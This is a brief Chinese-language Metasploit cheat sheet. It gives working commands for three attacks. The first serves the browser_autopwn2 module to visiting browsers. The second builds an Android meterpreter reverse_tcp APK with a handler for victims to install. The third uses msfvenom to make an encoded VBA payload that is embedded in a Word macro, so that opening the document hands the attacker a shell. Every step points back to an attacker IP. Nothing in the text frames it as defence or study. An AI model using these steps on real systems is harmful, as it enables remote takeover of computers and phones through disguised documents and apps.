auxiliary/server/browser_autopwn2模块
msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > set srvport 80
msf auxiliary(browser_autopwn2) > set uripath /
msf auxiliary(browser_autopwn2) > exploit
通过浏览器,去访问http://192.168.80.163/
msf > kill 0 关闭时,只需要kill 0
生成安卓apk
msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set lhost 192.168.80.163
msf payload(reverse_tcp) > generate -p android -f a.apk -t raw
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.80.163
msf exploit(handler) > exploit
在手机上安装a.apk文件。
VBScript感染方式
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
生成2部分内容:①VBA代码 ②十六进制的payload
利用过程:
第一部分粘入VBA代码(视图--宏--创建)
第二部分粘入word文档正文
打开word文档,MSF会获得目标主机的shell。